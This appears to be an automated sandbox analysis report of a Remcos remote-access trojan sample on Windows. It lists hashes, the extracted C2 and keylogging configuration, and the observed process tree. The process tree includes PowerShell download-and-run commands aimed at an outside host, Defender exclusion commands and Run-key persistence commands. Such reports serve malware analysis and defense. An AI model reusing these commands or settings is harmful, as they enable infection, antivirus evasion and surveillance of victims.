Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24-08-2022 20:25

General

  • Target

    74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe

  • Size

    149KB

  • MD5

    8e34dbf3bceb9c9cf22f32ea7d870be4

  • SHA1

    d9cd6c07ee134e10b179821808f617cdf2dc810b

  • SHA256

    74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056

  • SHA512

    3ccb54fdd4dff867a760c11b94f147b503ffd015cd5d8ee11a86f6afa0cfb3fe3507420bf5d94ee85f7c6773e0aa58084b83b142aa54cf9baea4824438143b47

  • SSDEEP

    3072:J90Eg7YOC0q0vGBYovRDlDybNTPCtRqFvYs:1gYtvJDlmbRX

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cothdesigns.com:443/obieznne.msi

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cothdesigns.com:443/KMS_Tool.msi

Extracted

Family

remcos

Botnet

220825

C2

cothdesigns.com:3456

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    180

  • copy_file

    software_reporter_tool.exe

  • copy_folder

    AppData\Local\Google

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %UserProfile%

  • keylog_crypt

    true

  • keylog_file

    adbkey.dat

  • keylog_flag

    false

  • keylog_path

    %Temp%

  • mouse_option

    false

  • mutex

    9416a517bdcd8521-XQOB43

  • screenshot_crypt

    true

  • screenshot_flag

    true

  • screenshot_folder

    Google

  • screenshot_path

    %Temp%

  • screenshot_time

    60

  • startup_value

    Google

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe
    "C:\Users\Admin\AppData\Local\Temp\74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del C:\Users\Admin\AppData\Local\Temp\74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3688
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
          PID:4600
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\system32\netsh.exe
        netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
        2⤵
          PID:4884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE'
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4608
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Windows\system32\netsh.exe
          netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
          2⤵
            PID:1388
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:4120
          • C:\Windows\system32\reg.exe
            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
            2⤵
            • Adds policy Run key to start application
            • Modifies registry key
            PID:4240
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1592
          • C:\Windows\system32\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
            2⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:3380
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns.com:443/obieznne.msi','C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe');C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe
          1⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3492
          • C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe
            "C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4592
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              3⤵
                PID:1368
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                3⤵
                  PID:4608
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  3⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:4724
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns.com:443/KMS_Tool.msi','C:\Users\Admin\AppData\Local\Temp\mwucxmvb.exe');C:\Users\Admin\AppData\Local\Temp\mwucxmvb.exe
              1⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:956

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe

              Filesize

              2.4MB

              MD5

              f7f90d8534bb346735f6cd493bf056ac

              SHA1

              12c6d5bd30a6a527f54a3f75a11b79732e0d423d

              SHA256

              62ed1666f0b8e675d3b0f3a4aad789a2e16ff1678c790675760f5e512a573fd1

              SHA512

              8c75a11cfab2f5c5217b605eed84d170e6c08289fbc32237b905909a6d8a52822cba60f9f6ef48d42ea297d47a66751579ee87d6a638b21d73fd8641ce4651d1

            • C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe

              Filesize

              2.4MB

              MD5

              f7f90d8534bb346735f6cd493bf056ac

              SHA1

              12c6d5bd30a6a527f54a3f75a11b79732e0d423d

              SHA256

              62ed1666f0b8e675d3b0f3a4aad789a2e16ff1678c790675760f5e512a573fd1

              SHA512

              8c75a11cfab2f5c5217b605eed84d170e6c08289fbc32237b905909a6d8a52822cba60f9f6ef48d42ea297d47a66751579ee87d6a638b21d73fd8641ce4651d1

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              56efdb5a0f10b5eece165de4f8c9d799

              SHA1

              fa5de7ca343b018c3bfeab692545eb544c244e16

              SHA256

              6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

              SHA512

              91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              MD5

              d41d8cd98f00b204e9800998ecf8427e

              SHA1

              da39a3ee5e6b4b0d3255bfef95601890afd80709

              SHA256

              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

              SHA512

              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              aaa8e5c3ec5568db80bcb624fe4f398b

              SHA1

              04101a67873cd65a523a9778f2afd63fb6e24649

              SHA256

              5f3be02b6d5b584ac7a6aa0d20c77e997db7b0b1fa89bc5bba812abf26f60327

              SHA512

              d928c26e200c4df5a6413bf77e68611fa9a80b05d789b142bd3b42ad23d7d8b2e8b80ba11a7693f668b0be9336041ee2d9925c5c5c4029150699ca6e2a6a369c

            • memory/1388-122-0x0000000000000000-mapping.dmp

            • memory/2708-115-0x000001CCC3E10000-0x000001CCC3E3C000-memory.dmp

              Filesize

              176KB

            • memory/3380-132-0x0000000000000000-mapping.dmp

            • memory/3688-199-0x0000000000000000-mapping.dmp

            • memory/4240-131-0x0000000000000000-mapping.dmp

            • memory/4592-251-0x00000000006D0000-0x0000000000934000-memory.dmp

              Filesize

              2.4MB

            • memory/4592-10083-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-218-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-219-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-220-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-221-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-222-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-223-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-224-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-226-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-227-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-256-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-229-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-230-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-231-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-232-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-213-0x0000000000000000-mapping.dmp

            • memory/4592-233-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-234-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-235-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-236-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-237-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-238-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-239-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-240-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-241-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-242-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-243-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-244-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-245-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-247-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-246-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-248-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-257-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10088-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-253-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-252-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-255-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-228-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-217-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-249-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-259-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-260-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-261-0x0000000005090000-0x00000000052F2000-memory.dmp

              Filesize

              2.4MB

            • memory/4592-258-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-263-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-262-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-264-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-266-0x00000000055A0000-0x0000000005632000-memory.dmp

              Filesize

              584KB

            • memory/4592-267-0x0000000005550000-0x0000000005572000-memory.dmp

              Filesize

              136KB

            • memory/4592-265-0x00000000059B0000-0x0000000005EAE000-memory.dmp

              Filesize

              5.0MB

            • memory/4592-268-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-250-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10069-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10070-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10071-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10072-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10074-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10073-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10075-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10076-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10077-0x0000000006F40000-0x0000000007290000-memory.dmp

              Filesize

              3.3MB

            • memory/4592-10078-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10079-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10080-0x0000000007290000-0x00000000072F6000-memory.dmp

              Filesize

              408KB

            • memory/4592-10081-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10082-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-254-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10084-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10085-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10086-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4592-10087-0x0000000077AD0000-0x0000000077C5E000-memory.dmp

              Filesize

              1.6MB

            • memory/4600-203-0x0000000000000000-mapping.dmp

            • memory/4608-121-0x000001DBF5BE0000-0x000001DBF5C02000-memory.dmp

              Filesize

              136KB

            • memory/4608-138-0x000001DBF6050000-0x000001DBF60C6000-memory.dmp

              Filesize

              472KB

            • memory/4724-10090-0x00000000004327A4-mapping.dmp

            • memory/4724-10145-0x0000000000400000-0x000000000047B000-memory.dmp

              Filesize

              492KB

            • memory/4724-10151-0x0000000000400000-0x000000000047B000-memory.dmp

              Filesize

              492KB

            • memory/4884-117-0x0000000000000000-mapping.dmp